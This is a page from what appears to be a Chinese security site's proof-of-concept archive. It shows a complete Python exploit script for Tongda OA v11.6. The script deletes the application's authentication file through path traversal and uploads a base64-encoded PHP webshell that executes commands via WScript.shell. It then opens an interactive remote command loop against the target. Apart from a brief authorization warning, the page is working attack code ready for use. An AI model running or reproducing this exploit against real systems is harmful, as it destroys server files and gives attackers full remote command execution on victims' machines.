menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right POC chevron_right 通达OA v11.6 任意文件删除&RCE.py
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    通达OA v11.6 任意文件删除&RCE.py
    4.37 KB / 2021-04-15 12:15:17
        #!/usr/bin/python3
    #-*- coding:utf-8 -*-
    # author : PeiQi
    # from   : http://wiki.peiqi.tech
    
    
    import requests
    import re
    import base64
    import sys
    
    
    def title():
        print('+------------------------------------------')
        print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
        print('+  \033[34mVersion: 通达OA v11.6 任意文件删除&RCE                                \033[0m')
        print('+  \033[36m使用格式:  python3 poc.py                                           \033[0m')
        print('+  \033[36mUrl    >>> http://xxx.xxx.xxx.xxx                                 \033[0m')
        print('+  \033[36mCmd    >>> whoami                                                 \033[0m')
        print('+------------------------------------------')
    
    def POC_1(target_url):
        check_url = target_url + "/module/appbuilder/assets/print.php"
        try:
            check_url_response  = requests.get(url = check_url)
            if check_url_response.status_code == 200:
                print("\033[32m[o] 存在 /module/appbuilder/assets/print.php 可能含有通达OA v11.6 任意文件删除&RCE漏洞\033[0m")
                input("\033[32m[o] 此漏洞会对真实环境造成影响,请在授权的情况下利用此漏洞,按下任意键继续..... \033[0m")
            else:
                print("\033[31m[x] 不存在 /module/appbuilder/assets/print.php 漏洞利用失败 \033[0m")
                sys.exit(0)
        except Exception as e:
                print("\033[31m[x] 请求失败,{} \033[0m".format(e))
                sys.exit(0)
    
    def POC_2(target_url):
        unlink_url = target_url + "/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
        try:
            unlink_response = requests.get(url = unlink_url)
            if unlink_response.status_code == 200:
                print("\033[32m[o] 成功删除校验文件 auth.inc.php \033[0m")
            else:
                print("\033[31m[x] 删除校验文件 auth.inc.php 失败 \033[0m")
                sys.exit(0)
        except Exception as e:
                print("\033[31m[x] 请求失败,{} \033[0m".format(e))
                sys.exit(0)
    
    def POC_3(target_url, payload_php):
        """
          (绕过的webshell)
          <?php
          $command=$_GET['peiqi'];
          $wsh = new COM('WScript.shell');
          $exec = $wsh->exec("cmd /c ".$command);
          $stdout = $exec->StdOut();
          $stroutput = $stdout->ReadAll();
          echo $stroutput;
          ?>
        """
        vuln_url = target_url + "/general/data_center/utils/upload.php?action=upload&filetype=peiqi&repkid=/.<>./.<>./.<>./"
        files = {'FILE1': ('peiqi.php', payload_php)}
        try:
            vuln_response = requests.post(url = vuln_url,files=files)
            if vuln_response.status_code == 200:
                print("\033[32m[o] 成功写入webshell文件: _peiqi.php \033[0m")
                print("\033[32m[o] webshell地址为: {}/_peiqi.php \033[0m".format(target_url))
            else:
                print("\033[31m[x] 写入webshell文件失败 \033[0m")
                sys.exit(0)
        except Exception as e:
            print("\033[31m[x] 请求失败,{} \033[0m".format(e))
            sys.exit(0)
    
    def POC_4(target_url, cmd):
        cmd_url = target_url + "/_peiqi.php?peiqi={}".format(cmd)
        try:
            cmd_response = requests.get(url = cmd_url)
            if cmd_response.status_code == 200:
                print("\033[32m[o] 正在执行命令: {} \033[0m".format(cmd_url))
                print("\033[32m[o] 响应为: \n{} \033[0m".format(cmd_response.text))
            else:
                print("\033[31m[x] 命令执行失败 \033[0m")
                sys.exit(0)
        except Exception as e:
            print("\033[31m[x] 请求失败,{} \033[0m".format(e))
            sys.exit(0)
    
    if __name__ == '__main__':
        title()
        target_url = str(input("\033[35mPlease input Attack Url\nUrl   >>> \033[0m"))
        POC_1(target_url)
        POC_2(target_url)
        payload_php = base64.b64decode("PD9waHAKICAgICRjb21tYW5kPSRfR0VUWydwZWlxaSddOwogICAgJHdzaCA9IG5ldyBDT00oJ1dTY3JpcHQuc2hlbGwnKTsKICAgICRleGVjID0gJHdzaC0+ZXhlYygiY21kIC9jICIuJGNvbW1hbmQpOwogICAgJHN0ZG91dCA9ICRleGVjLT5TdGRPdXQoKTsKICAgICRzdHJvdXRwdXQgPSAkc3Rkb3V0LT5SZWFkQWxsKCk7CiAgICBlY2hvICRzdHJvdXRwdXQ7Cj8+").decode("utf-8")
        POC_3(target_url, payload_php)
    
        while True:
            cmd = input("\033[35mCmd >>> \033[0m")
            if cmd == "exit":
                sys.exit(0)
            else:
                POC_4(target_url, cmd)
    
    
    
    
    links
    file_download